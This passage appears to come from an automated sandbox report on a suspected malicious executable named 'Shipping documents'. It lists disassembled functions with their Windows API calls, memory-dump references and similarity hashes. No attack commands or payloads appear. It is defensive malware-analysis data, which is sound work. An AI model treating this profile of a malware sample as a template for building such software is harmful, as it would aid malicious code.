                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                          • String ID:
                                                                                                          • API String ID: 3275902921-0
                                                                                                          • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                                                          • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                                                                          • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                                                          • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                                                                          Function 004556C8 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                          • String ID:
                                                                                                          • API String ID: 3275902921-0
                                                                                                          • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                                                          • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                                                                          • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                                                          • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                                                                          Function 004331A2 Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                                                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                          • String ID:
                                                                                                          • API String ID: 2833360925-0
                                                                                                          • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                                          • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                                                                          • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                                          • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                                                                          Function 004555A8 Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32 ref: 004555C7
                                                                                                          • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                                                                          • DeleteObject.GDI32(?), ref: 00455736
                                                                                                          • DeleteObject.GDI32(?), ref: 00455744
                                                                                                          • DestroyIcon.USER32(?), ref: 00455752
                                                                                                          • DestroyWindow.USER32(?), ref: 00455760
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3691411573-0
                                                                                                          • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                                                          • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                                                                                          • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                                                          • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                                                                                          Function 00447275 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                            • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                            • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                          • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                                                                          • LineTo.GDI32(?,?,?), ref: 004472AC
                                                                                                          • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                                                                          • LineTo.GDI32(?,?,?), ref: 004472C6
                                                                                                          • EndPath.GDI32(?), ref: 004472D6
                                                                                                          • StrokePath.GDI32(?), ref: 004472E4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                                                          • String ID:
                                                                                                          • API String ID: 372113273-0
                                                                                                          • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                                          • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                                                                          • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                                          • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                                                                          Function 0044CC51 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetDC.USER32(00000000), ref: 0044CC6D
                                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                                                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                                                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CapsDevice$Release
                                                                                                          • String ID:
                                                                                                          • API String ID: 1035833867-0
                                                                                                          • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                                          • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                                                                          • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                                          • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                                                                          Function 00417082 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __getptd.LIBCMT ref: 0041708E
                                                                                                            • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                                            • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                                          • __amsg_exit.LIBCMT ref: 004170AE
                                                                                                          • __lock.LIBCMT ref: 004170BE
                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                                                                          • _free.LIBCMT ref: 004170EE
                                                                                                          • InterlockedIncrement.KERNEL32(01932DA8), ref: 00417106
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                          • String ID:
                                                                                                          • API String ID: 3470314060-0
                                                                                                          • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                                                          • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                                                                          • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                                                          • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                                                                          Function 0044B63B Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                                                                          • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                                                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                                                                            • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                          • String ID:
                                                                                                          • API String ID: 3495660284-0
                                                                                                          • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                                          • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                                                                          • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                                          • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                                                                          Function 00410AB0 Relevance: 9.0, APIs: 6, Instructions: 40keyboardCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Virtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 4278518827-0
                                                                                                          • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                                          • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                                                                          • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                                          • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                                                                          Function 004151BB Relevance: 9.0, APIs: 6, Instructions: 29threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                                            • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                            • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                          • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                                            • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                          • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                                          • ExitThread.KERNEL32 ref: 004151ED
                                                                                                          • __freefls@4.LIBCMT ref: 00415209
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                          • String ID:
                                                                                                          • API String ID: 442100245-0
                                                                                                          • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                                                          • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                                                                          • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                                                          • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                                                                          Function 0045F790 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 216windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                          • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                                                                          • _wcslen.LIBCMT ref: 0045F94A
                                                                                                          • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                          • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 621800784-4108050209
                                                                                                          • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                                                          • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                                                                          • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                                                                                          • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                                                                          Function 00478172 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 176COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                          • SetErrorMode.KERNEL32 ref: 004781CE
                                                                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                                                                            • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                          • SetErrorMode.KERNEL32(?), ref: 00478270
                                                                                                          • SetErrorMode.KERNEL32(?), ref: 00478340
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                                                                          • String ID: \VH
                                                                                                          • API String ID: 3884216118-234962358
                                                                                                          • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                                          • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                                                                          • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                                          • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                                                                          Function 00434B02 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 108libraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                                                                          • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                                                                          • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
